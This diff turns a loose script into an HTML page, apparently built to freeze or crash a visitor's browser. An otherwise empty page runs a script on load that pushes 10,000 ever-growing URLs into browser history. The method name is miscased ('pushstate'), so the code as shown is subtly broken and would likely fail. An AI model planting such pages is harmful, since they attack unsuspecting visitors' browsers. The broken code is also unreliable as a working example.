--- a/2.html
+++ b/2.html
@@ -1,7 +1,22 @@
-var total ="";
+<!DOCTYPE html>
+<html>
+<head>
+	<title>page</title>
+	<meta charset="utf-8">
+	<script type="text/javascript">
+		var total ="";
 
-for(var i =o; i < 10000; i++)
-{
-	total = total + i.toString();
-	history.pushstate(0,0,total);
-}
+		for(var i =0; i < 10000; i++)
+		{
+			total = total + i.toString();
+
+			history.pushstate(0,0,total);
+		}
+	</script>
+</head>
+<body>
+
+</body>
+</html>
+
+
